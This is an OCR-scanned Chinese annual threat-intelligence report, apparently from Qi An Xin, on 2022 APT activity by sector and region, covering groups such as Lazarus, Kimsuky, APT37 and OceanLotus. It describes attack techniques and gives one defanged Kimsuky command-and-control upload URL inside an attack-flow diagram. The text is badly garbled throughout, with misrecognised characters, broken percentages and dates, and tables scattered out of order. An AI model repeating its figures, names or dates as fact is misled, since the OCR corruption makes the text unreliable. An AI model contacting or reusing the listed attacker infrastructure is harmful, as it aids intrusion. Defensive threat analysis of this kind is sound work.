整理 开源 情报 ， 发 现 2022 年 威胁 组 织 针 对 Android、Linux、macOS、10S 等 非 Windows 平 台 的 攻击 
活动 也 不 断 增 多 。 除 开 以 Windows 为 攻击 目标 的 事件 外 ，Android 相 关 事件 占 比 达 50%，Linux 占 比 
28.95%%，macOS 和 10S 分 别 占 比 13.16%、7.89%， 涉 及 已 命名 的 威胁 组 织 27 个 。 


2022 年 监测 到 相关 重点 攻击 事件 如 下 表 。 
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事件 名 称 披露 时 间 攻击 平台 
Pl 武器 库 更 新 : 基于 Golang 的 Linux AILA FH 2022.01 rw 
新 组 织 VajraEleph 瞄准 巴基斯坦 军 方 人 员 P! 2022.03 Android 
5 Turla 组 织 有 关 的 Android 恶意 软件 分 析 P 2022.04 Android 
新 发 现 的 零点 击 iPhone 漏洞 用 于 NSO 间谍 软件 攻击 所 2022.04 IOS 
“ 海 莲花 ”作战 武器 “Buni” 最 新 曝光 ， 瞄 准 Linux FS 2022.03 Linux 
Bitter APT 小 组 使 用 “Dracarys”Android 间谍 软件 四 2022.08 Android 
APT42 组 织 详情 披露 品 2022.09 Android、Windows 
Kimsuky 组 织 针对 Android 设备 的 新 恶意 软件 四 2022.10 Android 
APT 组 织 海 莲花 内 网 渗透 手法 详情 披露 P 2022.11 Windows、Linux 
Lazarus 组 织 利用 经 证 书签 名 的 恶意 软件 攻击 macOS 用 户 2022.12 macOS 
双 尾 蝎 组 织 新 型 移动 端 恶意 软件 揭秘 P1 2022.12 Android 


A. “% 2.6 2022 年 非 Windows 平台 攻击 事件 


E. 2022 年 全 球 受害 行业 分 析 


APT 威胁 是 定向 性 的 ， 攻 击 者 往往 会 选择 发 起 攻击 的 行业 、 地 域 和 受害 者 目标 ， 这 些 是 由 APT 组 织 在 实 
施行 动 前 制定 的 需要 达到 的 阶段 性 目标 和 行动 背后 的 动机 所 决定 的 。 从 历史 经 验 来 看 ，APT 组 织 在 一 段 
时 间 内 会 保持 对 其 攻击 目标 行业 的 专注 ， 这 可 能 也 源 自 攻击 组 织 在 针对 新 的 行业 实施 攻击 时 ， 需 要 时 间 
收集 和 熟悉 目标 ， 弥 补 自身 能 力 以 适 配 目标 行业 ， 以 及 构建 相应 的 攻击 武器 库 。 


2021 年 ， 政 府 、 医 疗 和 科技 这 三 个 行业 是 APT 威胁 的 主要 行业 目标 。2022 年 ， 政 府 部 门 仍 是 APT 组 
织 的 首要 攻击 目标 , 其 次 是 国防 军事 行业 , 与 之 相关 的 攻击 活动 非常 活跃 。 此 外 , 金融 商贸 、 能 源 、 科 技 、 


新 闻 媒 体 等 行业 也 成 为 2022 年 APT 活动 关注 的 热点 ， 出 现 了 很 多 新 的 攻击 特点 ， 发 生 了 多 起 影响 深远 
的 APT 攻击 事件 。 
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《2》 奇 安信 威胁 情报 中 心 


国防 军事 


国防 军事 行业 是 国家 安全 的 支柱 ， 常 常 是 网 络 攻 击 的 热点 目标 ， 尤 其 是 在 地 缘 政 治 关 系 复杂 的 地 区 ， 
2022 年 国防 军事 行业 相关 攻击 事件 数量 较 往年 更 为 突出 。 


南亚 方向 的 摩 词 草 、 萝 灵 花 、 肚 脑 虫 、 响 尾 蛇 等 组 织 在 2022 年 积极 针对 巴基斯坦 、 尼 泊 尔 等 国家 的 国防 、 
军事 目标 。 


奇 安信 病毒 响应 中 心 移动 安全 团队 在 2022 年 3 月 披露 了 一 个 来 自 南 亚 某国 的 新 APT 组 织 ， 并 将 其 命 
为 金刚 象 组 织 ”， 该 组 织 针对 巴基斯坦 军 方 展开 军事 间谍 情报 活动 。 影 响 超过 数 十 名 巴基斯坦 军 方 人 员 。 


东欧 方向 涉及 军事 目标 的 攻击 事件 主要 与 俄 乌 冲突 相关 ， 攻 击 范围 辐射 至 其 他 西方 国家 。 


2022 年 1 月 ，Trellix 研究 人 员 发 现 疑 似 APT28 组 织 利 用 CVE-2021-40444'?! 针对 负责 国家 安全 政策 的 
高 级 政府 官员 和 西亚 国防 工业 的 个 人 。 随 后 的 2 月，CISA 发 布 关于 APT28 针对 美国 国防 承包 商 攻击 的 
信息 号。 该 组 织 利 用 对 国防 承包 商 网 络 的 访问 权 获 取 有 关 美 国 国防 情报 计划 和 能 力 的 敏感 数据 ， 包 括 数 
百 份 涉及 公司 产品 、 与 他 国 关 系 以 及 内 部 人 员 和 法 律 事务 相关 内 容 的 文件 。 此 外 ， 国 外 安全 厂商 sekoia 
披露 了 Turla 组 织 针 对 波罗的海 国防 学 院 的 入 侵 活动 六。 


2022 ££ 4 H, Lazarus 组 织 利 用 VMware View 服务 器 上 的 Log4j 漏洞 (CVE-2021-44228) 攻击 一 家 能 源 
和 军事 领域 公司 加 ， 并 使 用 了 其 定制 的 Preft 后 门 的 更 新 版 本 。9 月 ， 微 软 研究 人 员 发 现 该 组 织 使 用 武 
器 化 的 合法 开源 软件 S) 针对 美国 、 英 国 、 印 度 和 俄罗斯 的 国防 和 航空 航天 等 行业 。 


金融 商贸 


受 新 冠 疫情 的 持续 影响 ， 以 及 俄 乌 战争 的 冲击 ，2022 年 全 球 经 济 形 势 暗淡 。 在 此 背景 下 ， 针 对 金融 、 
银行 以 及 商贸 组 织 的 高 级 威胁 活动 持续 不 断 。 在 2022 年 ， 整 个 金融 商贸 行业 成 为 了 APT 攻击 活动 的 一 
大 焦点 。 


2022 年 初 ， 国 外 安全 厂商 zscaler 发 现 有 着 国家 背景 的 Molerats APT 组 织 使 用 中 东 地 缘 政 治 冲突 的 相 
关 诱 乌 针 对 巴勒斯坦 银行 的 关键 成 员 ， 意 图 窃取 敏感 信息 ""。1 月 20 日 ， 印 度 尼 西亚 中 央 银 行 (BI) 
证 实 ， 该 银行 于 2021 年 12 月 遭 到 勒索 软件 攻击 中。 据悉 ， 此 次 攻击 由 Conti 勒索 团伙 发 起 ， 该 团伙 
已 经 泄露 了 一 些 从 印度 尼 西 亚 银行 网 络 窃取 的 文件 。 
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Lazarus 组 织 在 2022 年 被 发 现 多 次 针对 金融 实体 "* ， 尤 其 是 日 本 国家 的 金融 机 构 ， 包 括 银行 “|、 
风 投 公司 中 等 ,11 月 29 日 , 奇 安信 威胁 情报 中 心 发 现 Lazarus 利 用 VHD 攻击 样本 针对 日 本 银行 从 业 人 员 ， 
可 能 以 敛财 为 目的 进行 攻击 。 


2022 年 7 月 ，EvilNum 攻击 欧洲 金融 和 投资 实体 的 恶意 活动 被 披露 ， 该 组 织 特别 针对 那些 支持 外 汇 、 
加 密 货币 和 去 中 心 化 金融 的 业务 实体 P" 9 月 ， 该 组 织 针对 地 中 海 沿岸 的 西欧 诸 国 进行 攻击 中， 目标 行 
业 涵盖 线 上 银行 、 互 联网 金融 、 加 密 货币 平台 、 线 上 娱乐 等 ， 以 获取 线 上 交易 现金 流 。 


2022 年 12 月 ， 国 外 安全 厂商 ASEC 的 分 析 团 队 发 现 Kimsuky 组 织 创 建 了 多 个 仿造 金融 部 门 正常 网 站 
的 恶意 域名 ” 用 于 实施 针对 相关 人 员 帐 户 凭据 的 钓鱼 攻击 。 同 时 期 ， 研 究 人 员 发 现 具 有 南亚 国家 背景 
的 APT 组 织 透 明 部 落 利 用 伪装 成 外 贸 相 关 文档 的 恶意 样本 进行 攻击 “"。 


科技 行业 


言 息 技 术 的 迅速 发 展 ， 催 生 了 很 多 新 兴 互 联网 产业 ， 也 影响 着 世界 产业 经 济 的 增长 。 随 着 互联 网 科技 行 
业 的 繁荣 ， 网 络 安全 需求 也 日 益 增多 。 不 仅 近 年 来 热度 不 减 的 区 块 链 领域 饮 受 各 路 黑客 团伙 的 攻击 ， 
IT、 运 维 领域 的 从 业 人 员 也 因为 软件 服务 的 上 下 游 关系 变 成 攻击 者 的 目标 。 


(1) 区 块 链 
2022 年 针对 区 块 链 进行 攻击 的 APT 组 织 主要 是 来 自 东 亚 地 区 的 Lazarus 和 Kimsuky， 尤 其 Lazarus 最 
为 活跃 。 


Lazarus 组 织 自 2014 年 开始 针对 全 球 金融 机 构 、 虚 拟 货币 交易 所 等 目标 ， 近 年 来 针对 加 密 货 币 相关 的 
攻击 越发 频繁 。 根 据 开 源 情报 数据 的 不 完全 统计 ，2022 年 Lazarus 针对 区 块 链 行业 共 发 起 了 12 次 攻击 
活动 。 


2022 年 2 H, Google 研究 人 员 披 露 了 与 Lazarus 组 织 两 项 长 期 攻击 活动 Operation Dream Job 和 
Operation AppleJeus 相关 的 近期 攻击 l, Ern Operation AppleJeus 相关 的 近期 攻击 涉及 加 密 货币 和 
金融 科技 行业 的 八 十 余 名 受害 者 。 攻 击 者 通过 电子 邮件 、 虚 假 网 站 或 受 感染 的 合法 网 站 攻击 受害 者 ， 而 
这 些 网 站 最 终 将 激活 CVE-2022-0609 漏洞 利用 工具 包 。 


2022 年 8 月， 研究 人 员 发 现 Lazarus 通过 发 布 虚假 的 Coinbase 就 职 机 会 诱骗 目标 用 户 安 装 其 精心 定制 
的 恶意 软件 ， 目 标 平台 包括 Windows, macos., ESET 的 研究 人 员 将 该 活动 称 为 Operation In(ter) 
caption。12 月 ， 国 外 安全 厂商 K7 Computing 研究 人 员 发 现 Lazarus 组 织 在 该 活动 的 最 新 攻击 案例 中 
利用 经 过 证 书签 名 的 恶意 软件 攻击 macOS AA °, 


ls 
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《2》 奇 安信 威胁 情报 中 心 


与 Lazarus 相 比 ，Kimsuky 组 织 针对 区 块 链 的 活动 则 比较 少 ， 主 要 通过 带 有 加 密 货币 资产 、 数 字 钱 包 服 。 
务 中 心 等 诱 乌 内 容 的 Word 文档 进行 钓鱼 攻击 。 


(2) 运 维 、IT 

2022 年 11 月 ， 奇 安信 威胁 情报 中 心 观察 到 海 莲 花 针 对 运 维 人 员 的 攻击 活动 站。 攻击 者 利用 CNVD- 
2022-03672 漏洞 攻陷 运 维 人 员 电 脑 ， 从 电脑 桌面 的 密码 本 上 窃取 了 连接 服务 器 todesk 服务 的 口令 , 之 
后 海 莲花 通过 todesk 远程 登录 服务 器 手动 拷贝 带 有 木马 文件 的 压缩 包 ， 并 右键 解压 执行 。 


另外 ，ESET 的 研究 人 员 发 现 Agrius 攻击 者 在 2022 年 2 月 开始 瞄准 以 色 列 的 人 力 资源 和 IT 咨询 公司 


等 目标 中。 研究 人 员 认 为 Agrius 攻击 者 进行 了 供应 链 攻 击 ， 通 过 以 色 列 软件 开发 商 部 署 数据 擦 除 器 
Fantasy 以 及 新 的 横向 移动 工具 和 Fantasy 执行 工具 Sandals。 


(m) 能 源 行业 


能 源 乃 国家 之 命脉 ， 世 界 经 济 的 飞速 发 展 都 是 建立 在 对 能 源 的 大 量 需求 这 个 基础 之 上 。 在 地 缘 政 治 冲 突 
爆发 、 经 济 暗淡 的 2022 年 ， 能 源 行业 也 备 受 APT 组 织 关 注 。 


俄 乌 冲突 爆发 后 ，Sandworm 组 织 曾 试图 使 用 Industroyer2 恶意 软件 攻击 乌克兰 一 家 大 型 能 源 供 应 
商 7, Bë T Industroyer2 之 外 ，Sandworm 还 使 用 了 多 个 破坏 性 恶意 软件 ， 包 括 CaddyWiper、 
ORCSHRED、SOLOSHRED 和 AWFULSHRED。 

8 月 ， 研 究 人 员 发 现 Gamaredon 企图 破坏 北约 成 员 国内 的 一 家 大 型 炼油 公司 ， 但 未 成 功 3]。 

国外 厂商 Cisco Talos 观察 到 Lazarus 在 2022 年 2 月 至 2022 年 7 月 期 间 针 对 世界 各 地 的 能 源 供应 商 ， 
包括 总 部 位 于 美国 、 加 拿 大 和 日 本 的 能 源 企 业 。 该 活动 旨 在 渗透 目标 组 织 ， 建 立 长 期 访问 权限 ， 窃 取 攻 
击 者 感 兴趣 的 数据 。 


此 外 ， 中 东 地 区 的 Lyceum 组 织 利 用 新 的 DNS 后 门 攻击 能 源 部 门 ， 该 后 门 允许 攻击 者 远程 执行 系统 命 
令 并 在 受 感染 的 机 器 上 进行 上 传 或 下 载 数据 操作 1。 


相 比 2021 年 美国 石油 管道 运输 巨头 Colonial Pipeline 公司 遭受 DarkSide 勒索 软件 攻击 ，2022 年 攻击 
者 针对 能 源 行业 的 动机 更 多 在 于 冲突 国 的 破坏 ， 以 及 敏感 数据 窃取 。 
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= = 地 缘 下 的 APT 组 织 、 活 动 和 趋势 


地 域 分 析 是 APT 研究 的 重要 方面 。 一 方面 ， 同 一 地 域 范 围 的 APT 组 织 和 APT 活动 常常 出 现 一 些 重 蔷 ， 
其 可 能 针对 相似 的 攻击 目标 或 者 使 用 类 似 的 TTP; 另 一 方面 ， 同 一 地 区 发 生 的 很 多 APT 活动 ， 都 与 地 缘 
政治 因素 密切 相关 ， 这 对 分 析 APT 活动 的 意图 和 动机 很 有 帮助 。 


3.1 列举 了 2022 年 全 球 各 地 区 主要 活跃 的 APT 组 织 ， 全 球 主要 APT 组 织 列 表 也 可 以 参见 附录 1, 


东欧 APT 组 织 — 攻击 能 力 


APT28 
APT29 


Turla Lazarus Group 
Gamaredon Group 123/ APT37 
Energetic Bear Kimsuky 
Darkhotel 
5zi 
北美 APT 组 织 
Longhorn 
PS Equation Group 
东南 亚 APT 组 织 — 攻击 能 力 
MuddyWater — Ó' 42 
APT34/ Oilnig Ne APT32 TF 
APT33 
Stealth Falcon/ / 
FruityArmor 一 
SandCat 南亚 APT 组 织 攻击 能 力 
BE : ++ 
anis 
Mie: £/ BITTER + HRE 
E i Donot Team + Regin 
双 尾 蝎 响尾蛇 / SideWinder 十 十 
27 十 
L- 
攻击 能 力 级 别 国 图 大 小 


击 载荷 技术 ， 攻 击 活路 图 例 
ERM f t & © MRR Q 未 知 地 域 归 局 


Z| 3.1 2022 年 全 球 APT 组 织 分 布 情况 


i 2022 年 度 报告 


«(9 奇 安信 威胁 情报 中 心 


东亚 地 区 的 组 织 与 行动 
East Asia 


东亚 地 区 一 直 以 来 都 是 世界 上 人 口 最 稠密 的 地 区 之 一 ， 有 人 的 地 方 就 有 江湖 ， 高 级 可 持续 网 络 威胁 
亦 是 如 此 。 据 不 完全 统计 ，2022 年 全 年 公开 披露 的 东亚 地 区 APT 组 织 报告 多 达 60 多 篇 ， 其 中 又 以 
Lazarus、Kimsuky 组 织 尤为 活跃 ， 对 这 两 个 组 织 的 分 析 报告 占 比 达到 了 80% 以 上 。 表 3.2 列 出 了 东亚 
地 区 部 分 APT 组 织 的 相关 信息 。 


东亚 APT 组 织 攻击 能 力 
Lazarus Group 十 十 
Group 123/ APT37 十 十 
Kimsuky 十 
Darkhotel 十 十 十 
ET 十 
HEA + 

I» 
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ww wa; 


' DarkHotel 

! 最 早 活动 时 间 : 2004 

| 公开 披露 时 间 : 2014 

| Darkhotel 组 织 由 卡巴 斯 基 最 早 在 

| 2014 年 披露 。 根 据 开源 报告 ， 该 组 织 
| 的 第 一 次 攻击 记录 在 2007 年 ， 并 在 
; 2010 年 激增 。 其 攻击 主要 针对 国防 工 
| 业 基 地 、 军 事 、 能 源 、 政 府 、 非 政府 
组 织 、 电 子 制造 、 制 药 和 医疗 等 部 门 
Y 


Lazarus 
最 早 活动 时 间 : 2009 
公开 披露 时 间 : 2009 


Lazarus 组 织 被 认为 是 地 属 东 亚 的 APT 
组 织 ， 其 不 仅 专注 于 间谍 和 网 络 渗透 
攻击 ， 还 以 金融 机 构 、 虚 拟 货币 交易 
所 等 为 目标 ， 进 行 以 敛财 为 目的 的 攻 
击 活动 。 


Kimsuky 
最 早 活动 时 间 : 2013 
公开 披露 时 间 : 2013 


Kimsuky 最 早 由 卡巴 斯 基于 2013 年 
公开 披露 并 命名 ， 攻 击 活动 最 早 可 追 
HE 2012 年 。 其 被 认为 具有 东亚 地 区 
背景 ， 与 Group123 APT 组 织 存 在 基 
础 设施 重 玛 等 关联 性 


的 公司 高 管 、 研 究 人 员 和 开发 人 员 


A n 和 720 ON 


| APT37 虎 木 樟 (APT-Q-11) 伪 猎 者 (APT-Q-12) 

! 最 早 活动 时 间 : 2012 最 早 活动 时 间 : 2019 最 早 活动 时 间 : 2018 

公开 披露 时 间 : 2016 公开 披露 时 间 : 2019 公开 披露 时 间 : 2021 

! Group123， 也 称 ScarCruft， 在 2016 虎 木 检 组 织 由 奇 安信 威胁 情报 中 心 在 伪 猎 者 组 织 是 奇 安信 最 早 发 现 并 进行 
年 6 月 由 卡巴 斯 基 最 先进 行 披露 ， 最 2019 年 12 月 率先 披露 了 其 攻击 流程 ， 内 部 跟踪 的 一 个 APT 组 织 ， 该 组 织 主 
早 活跃 于 2012 年 ， 该 组 织 被 认为 与 该 组 织 擅 用 0day 漏洞 攻击 ， 使 用 多 要 针对 在 韩 中 国人 和 中 韩 贸 易 相 关 人 
! 2016 年 的 Operation Daybreak 和 种 攻击 手法 对 目标 进行 渗透 攻击 ， 攻 员 进 行 定 向 攻击 活动 。 该 团伙 善于 使 
Operation Erebus 有 关 。Group123 击 对 象 包 括 中 国 、 朝 鲜 等 。 用 鱼 叉 邮件 投递 LNK、CHM 恶意 文 
! 和 APT 组 织 Kimsuky fefe HIE ë 件 作 为 第 一 阶段 木马 ， 并 使 用 COM 
Y 劫持 的 方式 实现 持久 化 ， 拥 有 自己 的 
特种 木马 ， 免 杀 水 平 较 高 。 


Y Y 


Y 


one Rescue ae meis Musis d Ee sei 


A. 表 3.2 2022 年 东亚 地 区 活跃 APT 组 织 


Lazarus 组 织 ， 又 名 Hidden Cobra, ZINC 等 ， 是 东亚 地 区 最 活跃 的 APT 组 织 之 一 ,攻击 目标 遍布 全 球 ， 
涉及 经 济 、 政 府 等 多 个 领域 的 组 织 机 构 。 现 在 业界 普遍 认为 该 组 织 拥 有 BlueNoroff 和 Andariel 两 个 子 团 
伙 ， 其 中 BlueNoroff 专注 于 实施 金融 网 络 犯罪 ， 其 目标 是 金融 机 构 和 加 密 货 币 交 易 所 ， 而 Andariel 的 
攻击 目标 则 包括 其 他 国家 的 政府 、 基 础 设施 和 企业 。 


2022 年 度 ，Lazarus 组 织 针 对 加 密 货币 、 金 融 、 能 源 等 行业 的 活动 加 剧 。 在 公开 披露 的 活动 中 ， 其 利 
用 VMWare 服务 器 漏洞 在 企业 网 络 中 建立 初步 立足 点 ， 然 后 部 署 VSingle 和 YamaBot 等 定制 化 恶意 软 
件 以 及 MagicRAT 木马 ， 攻 击 目标 涉及 世界 各 地 的 能 源 供应 商 ， 包 括 总 部 位 于 美国 、 加 拿 大 和 日 本 的 能 
源 企 业 。 在 Lazarus 针对 荷兰 和 比利时 的 攻击 活动 中 ， 研 究 者 首次 发 现 针 对 戴尔 DBUtil 驱动 程序 CVE- 
2021-21551 漏洞 的 在 野 利用 ， 攻 击 者 借助 BYOVD 技术 利用 上 述 漏洞 进入 Windows 内 核 ， 并 禁用 感染 
机 器 上 的 所 有 安全 防护 监控 。 在 对 日 本 金融 业 攻 击 时 ,Lazarus 组 织 使 用 虚拟 磁盘 映像 文件 打包 攻击 组 件 ， 
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绕 过 微软 MOTW 保护 机 制 。 


Kimsuky 组 织 的 攻击 针对 他 国 智库 、 核 工业 、 能 源 、 教 育 等 行业 ， 多 次 以 韩国 的 政府 、 国 防 相 关内 容 
作为 诱饵 发 动 攻击 ， 受 害 国家 还 包括 美国 、 俄 罗斯 等 。Kimsuky 擅长 使 用 社会 工程 学 手段 ， 根 据 时 事 
热点 制作 钓鱼 邮件 发 送 给 受害 者 ， 配 合 下 发 的 恶意 软件 或 者 钓鱼 网 站 获取 特定 数据 。 在 《钓鱼 之 王 一 一 
APT-Q-2 (Kimsuky) 近期 以 多 个 话题 针对 韩国 的 鱼 叉 攻击 活动 分 析 》5 一 文中 ， 我 们 分 析 了 Kimsuky 
组 织 的 鱼 叉 式 钓鱼 攻击 流程 。 在 《来 自 Kimsuky 组 织 的 突 刺 : 多 种 攻击 武器 针对 韩国 的 定向 猎 杀 》5 
一 文中 ， 我 们 则 详细 阐述 了 Kimsuky 组 织 利 用 多 种 类 型 诱饵 文件 的 攻击 过 程 。 


hxxp://uppgrede.scienceontheweb.net/file/upload 


| 


GET /list.php?query-1 GET /lib.php?idx-1 POST /show.php 
获取 后 续 获取 后 续 回 传 信息 
(0. 释放 并 执行 内 存 执行 内 存 执行 
 —e <> | —— | «/» | —— 
EE) VBS VBS 
诱饵 文档 version.ini 释放 并 注册 
计划 任务 
VBS 


OfficeAppManifest_v[minute]_[hour]_[day+month].xml 


A. 图 3.3 Kimsuky 组 织 使 用 诱 乌 宏文 档 的 攻击 流程 


APT37 常 通过 钓鱼 邮件 投递 初始 恶意 载荷 ， 或 者 入 侵 合法 站 点 后 发 动 水 坑 攻 击 。 国 外 安全 厂商 通过 遥测 
发 现 APT37 未 曾 披露 的 后 门 Dolphin， 该 后 门 具 有 多 种 间谍 功能 ， 包 括 监控 磁盘 驱动 和 便携 式 设备 、 窃 
取 感 兴趣 的 文件 、 键 盘 记 录 、 截 屏 以 及 从 浏览 器 窃取 凭据 。APT37 还 擅 于 利用 0day/Nday 漏洞 ， 具 备 
一 定 的 漏洞 利用 能 力 。 在 10 月 下 旬 ，APT37 就 曾 利用 Internet Explorer 浏览 器 JScript 引擎 中 的 0day 


由 奇 安信 威胁 情报 中 心 于 2019 年 披露 的 东亚 APT 团伙 “ 虎 木 樟 ” (内 部 跟踪 代号 APT-Q-11) 在 2019- 
2021 三 年 间 利用 了 多 个 浏览 器 漏洞 ， 使 用 多 种 攻击 手法 对 目标 进行 渗透 攻击 。 在 《Operation( S o| 
HERZ )ShadowTiger. 盘 跟 在 佛 岩 山上 的 过 林 之 虎 》”" 一 文中 我 们 详细 介绍 了 该 组 织 使 用 的 攻击 手法 ， 
包括 普通 鱼 叉 邮件 钓鱼 、 浏 览 器 0day 和 鱼 叉 邮件 攻击 、 内 网 水 坑 攻 击 、 内 网 0day 横向 移动 。 


下 表 整 理 了 2022 年 度 东 亚 地 区 APT 组 织 的 主要 攻击 活动 。 
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披露 时 间 
APT37 “KONNI” 通 过 新 版 本 的 恶意 软件 植 入 物 瞄 准 俄罗斯 外 交 部门 ， 2022/1/3 cluster25 
APT37 KONNI 不 按 套 路 出 牌 ， 使 用 新 手法 针对 俄罗斯 方向 持续 展开 攻击 2022/1/12 微 步 在 线 
Lazarus Lazarus APT 在 最 新 的 活动 中 利用 Windows 更 新 客户 端 和 GtHub' 2022/1/27 Malwarebytes 
Kimsuky Kimsuky 组 织 正在 使 用 xRAT 恶意 软件 中 2022/2/8 ASEC 
Kimsuky 伪装 成 数字 资产 钱包 服务 客户 中 心 的 APT 攻击 活动 披露 7 2022/2/16 ESTsecurity Corp 
Darkhotel DarkHotel 活动 更 新 ， 针 对 澳门 豪华 酒店 和 2022/3/11 trellix 
Lazarus 应 对 来 自 Lazarus 组 织 的 威胁 9 2022/3/24 Google 
Kimsuky 使 用 关于 加 密 货币 的 Word 文件 的 APT 攻击 ^ 2022/3/25 ASEC 
Lazarus 用 于 传递 Lazarus 木马 化 的 DeFi 恶意 软件 应 用 程序 °l 2022/3/31 Kaspersky 
Lazarus FER: 疑似 Lazarus 组 织 针对 韩国 企业 的 攻击 活动 分 析 “ 2022/4/11 奇 安信 
Lazarus Lazarus 瞄准 化 工行 业 外 2022/4/14 Symantec 
aa iced 资 推介 书 中 的 淘金 者 一 APT-C-26 (Lazarus) 攻击 活动 分 析 2022/4/19 360 
Lazarus Lazarus 组 织 瞄 准 区 块 链 公司 9 2022/4/20 CISA 
Lazarus Stonefly 组 织 间谍 活动 针对 高 价值 目标 °! 2022/4/27 Symantec 
Lazarus Lazarus 武器 库 更 新 : Andariel 近期 攻击 样本 分 析 09 2022/4/28 ez 
Lazarus 使 用 社交 媒体 和 社会 工程 进行 初始 访问 中 2022/5/5 nccgroup 
Lazarus Lazarus Group 利用 Log4Shell 漏洞 ^? 2022/5/19 ASEC 
Kimsuky Kimsuky 的 攻击 企图 伪装 成 各 种 主题 的 新 闻 稿 P7 2022/5/25 ASEC 
Kimsuky 伪装 成 路 由 器 国 件 安 装 文件 分 发 AppleSeedE 2022/5/31 ASEC 
Kimsuky 党 鱼 的 狂欢 APT-C-55 Kimsuky 组 织 近 期 BabyShark 组 件 披露 P? 2022/6/T 360 
Kisses De APTQ2 (Kimsuky) 近期 以 多 个 话题 针对 韩国 的 鱼 又 攻击 2022/6/17 奇 安信 
Lazarus Lazarus 使 用 的 YamaBot 恶意 软件 P9! 2022/7/7 JPCert 
Lazarus APT-C-26 (Lazarus) 组 织 伪造 电 商 组 件 攻击 活动 分 析 报告 n 2022/17/15 360 


A. 表 3.4 2022 年 东亚 地 区 APT 组 织 热点 攻击 活动 *1 
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«Qe» 奇 安 信 威 胁 情报 中 心 


APT37 


WAKE 
(APT-Q-11) 


Lazarus 
Lazarus 
Kimsuky 
Kimsuky 
Lazarus 
Lazarus 
Kimsuky 
伪 猎 者 
(APT-Q-12) 
Lazarus 
Lazarus 
Kimsuky 
Lazarus 
Lazarus 
Kimsuky 
APT37 
Lazarus 
APT37 
Lazarus 
Lazarus 


Lazarus 


Kimsuky 


观察 到 APT37 新 的 攻击 活动 °! 


Operation( $*o|uz]Zl*)ShadowTiger: 盘 跟 在 佛 岩山 上 的 过 林 
之 虎 


Andariel 部 署 DTrack 和 Maui 勒索 软件 外 
加 密 货币 收割 机 : Lazarus APT 组 织 近 期 不 断 攻 击 加 密 货币 行业 中 
Kimsuky 近期 攻击 活动 披露 7 
Kimsuky 针对 俄罗斯 外 交 部 攻击 09 
MagicRAT: Lazarus 最 新 远程 访问 木马 分 析 0^ 
Lazarus 瞄准 能 源 供应 商 中 


来 自 Kimsuky 组 织 的 突 刺 : 多 种 攻击 武器 针对 韩国 的 定向 猫 杀 59 


伪 猎 者 APT 组 织 对 韩 定 向 攻击 : 
RAI 


瞄准 基金 会 代表 和 平 昌 和 平 论坛 政 
Lazarus Group 使 用 BYOVD 进行 Rootkit 攻击 分 析 报 告 5 
Lazarus 在 荷兰 和 比利时 以 亚马逊 为 主题 的 攻击 活动 "7 


Kimsuky 组 织 针对 Android 设备 的 新 恶意 软件 P! 


Lazarus 组 织 使 用 BYOVD 技术 禁用 反 恶 意 软 件 程序 的 攻击 案例 分 析 


求职 陷阱 : Lazarus 组 织 以 日 本 瑞穗 银行 等 招聘 信息 为 诱饵 的 攻击 活 
动 分 析 中 


Kimsuky 组 织 借助 IBM 公司 产品 投递 BabyShark 恶意 软件 


认识 ScarCruft 的 Dolphin A 7! 


AE Beware: 充当 AppleJeus 恶意 软件 前 线 的 虚假 加 密 货 币 应 用 
APT37 利用 Internet Explorer 0-day'?! 

Lazarus 组 织 利用 经 证 书签 名 的 恶意 软件 攻击 macOS 用 户 P? 
Lazarus 组 织 针对 加 密 货 币 和 NFT 用 户 开 展 大 规模 钓鱼 活动 " 
BlueNoroff 组 织 使 用 绕 过 Windows MotW 保护 的 新 方法 P? 


SharpTongue 部 署 邮件 窃取 浏览 器 扩展 “SHARPEXT” 09! 
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2022/7/20 


2022/7/21 


2022/8/9 


2022/8/17 


2022/8/25 


2022/8/26 


2022/9/7 


2022/9/8 


2022/9/14 


2022/9/14 


2022/9/22 


2022/9/30 


2022/10/24 


2022/10/31 


2022/11/29 


2022/11/29 


2022/11/30 


2022/12/1 


2022/12/7 


2022/12/20 


2022/12/24 


2022/12/27 


2022/7/28 


Kaspersky 


安 恒 


Kaspersky 


ESTsecurity 


Cisco 


Cisco 


微 步 在 线 


ASEC 


ESET 


S2W 


ESET 


Volexity 


Google 


K7 Computing 


SlowMist 


Kaspersky 


volexity 
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东南 亚 地 区 的 组 织 与 行动 
Southeast Asia 


东南 亚 地 区 最 为 活跃 的 APT 组 织 仍 是 海 莲花 ， 该 组 织 在 2022 年 对 我 国 国内 目标 频繁 发 起 攻击 。 近 年 来 
海 莲花 组 织 不 断 改进 攻击 手法 , 比如 在 攻击 活动 中 结合 开源 工具 , 渗透 时 利用 特定 软件 产品 的 0day 漏洞 。 
此 外 ， 我 们 和 友 商 还 发 现 了 该 组 织 针对 Linux 平台 的 更 多 攻击 武器 。 


攻击 能 


东南 亚 APT 组 织 


海 莲 花 /APT32 
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«9» 奇 安信 威胁 情报 中 心 


最 早 活动 时 间 ”公开 披露 时 间 


海 莲花 组 织 是 由 奇 安信 威胁 情报 中 心 最 早 披露 并 命名 的 一 个 APT 组 
织 , 其 自 2012 年 4 月 起 ， 该 组 织 针 对 中 国政 府 、 科 研 院 所 、 海 事 机 构 、 
海域 建设 、 航 运 企 业 等 相关 重要 领域 展开 了 有 组 织 、 有 计划 、 有 针对 
性 的 长 时 间 不 间断 攻击 。 
海 莲 花 组 织 的 攻击 目标 包括 中 国 和 东南 亚 地 区 多 国 ， 覆 盖 政府 机 构 、 
科研 院 所 、 媒 体 、 企 业 等 诸多 领域 。 


海 莲花 2012 2015 


A 3& 3.5 2022 年 东南 亚 地 区 活跃 APT 组 织 


从 2021 年 开始 ， 海 莲花 组 织 被 发 现 对 国内 外 的 路 由 器 、 摄 像 头 等 |oT 设备 进行 攻击 ， 入 侵 成 功 后 植 入 
tinyPortMapper、GOST (GO Simple Tunnel) 等 开源 转发 工具 ， 将 攻陷 的 IoT 设备 作为 C2 服务 器 的 
流量 跳板 。 与 lol 设备 建立 连接 后 ， 攻 击 者 会 党 试 上 传 BusyBox 或 Dropbear， 便 于 攻击 者 进一步 渗透 ， 
此 外 也 会 植 入 针对 Linux 平台 的 木马 进行 长 期 控制 9991, 


海 莲 花 组 织 如 今 会 在 攻击 活动 中 结合 各 式 各 样 的 开源 免 杀 Loader 加 载 后 门 从 而 绕 过 杀 软 查 杀 。 所 用 的 
Nim 语言 编写 的 加 载 器 就 是 结合 了 NimPackt-v1 与 Shellycoat 两 个 Github 开源 项 目的 产物 中。 该 组 
织 使 用 过 的 开源 Loader 还 包括 Shhhloader 和 Mortar Loader’ 


